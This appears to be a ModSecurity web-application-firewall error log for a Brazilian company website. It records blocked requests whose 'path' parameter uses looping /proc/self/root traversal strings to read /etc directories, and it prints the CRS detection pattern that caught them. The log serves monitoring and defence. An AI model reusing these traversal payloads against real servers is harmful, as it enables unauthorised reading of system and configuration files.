[Tue Mar 17 09:47:43.371250 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.46:49360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNbweiSKl8TjouI-YESQAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:45.772031 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.241.46:49366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNce82sZHvlq4xgHrFFgAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:48.209236 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.46:49380] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNdKBJNF7axNlVR0X-0wAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:49.558247 2026] [:error] [pid 2325:tid 140411607643904] [client 74.7.241.46:36806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNde82sZHvlq4xgHrFGAAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:50.879328 2026] [:error] [pid 1731:tid 140411716749056] [client 74.7.241.46:36810] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNdgb2qCuy5irgBMjLWAAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:52.190070 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.241.46:36826] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNeKBJNF7axNlVR0X-2AAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:53.528660 2026] [:error] [pid 2553:tid 140411582465792] [client 74.7.241.46:36840] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNef0Bec_B9OkZP_i_RAAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:57.500107 2026] [:error] [pid 2159:tid 140411607643904] [client 74.7.241.46:36856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNffct6CQ8jnRyg2p-RAAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:59.875411 2026] [:error] [pid 11469:tid 140411641214720] [client 74.7.241.46:35022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNf5DEJR9VXonE_-1R5gAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:02.567301 2026] [:error] [pid 1731:tid 140411691570944] [client 74.7.241.46:35026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNggb2qCuy5irgBMjLYwAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:03.879023 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.241.46:35030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNg1KJy4A1bGlmj9BX2AAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:10.742981 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.241.46:35042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNigeiSKl8TjouI-YEWwAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:12.019407 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.241.46:39040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNjNCmCSWTlPouqorOIgAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:13.257234 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.241.46:39046] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNjZqmL8PQht4WJFlKogAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:14.459227 2026] [:error] [pid 1731:tid 140411649607424] [client 74.7.241.46:39062] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNjgb2qCuy5irgBMjLZwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:14.825177 2026] [:error] [pid 1210:tid 140411649607424] [client 74.7.243.203:45806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNjlKJy4A1bGlmj9BX4wAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:16.811191 2026] [:error] [pid 2159:tid 140411540502272] [client 74.7.241.46:39074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNkPct6CQ8jnRyg2p-TQAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:18.107075 2026] [:error] [pid 2553:tid 140411699963648] [client 74.7.241.46:53902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNkv0Bec_B9OkZP_i_UgAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:19.296284 2026] [:error] [pid 2553:tid 140411574073088] [client 74.7.241.46:53906] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNk_0Bec_B9OkZP_i_UwAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:48:19.423919 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.243.203:59236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNk6BJNF7axNlVR0X-8wAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:48:21.678412 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.46:53918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNlQeiSKl8TjouI-YEXwAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:48:23.318987 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.244.31:32998] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablNlweiSKl8TjouI-YEYwAAA8I"]
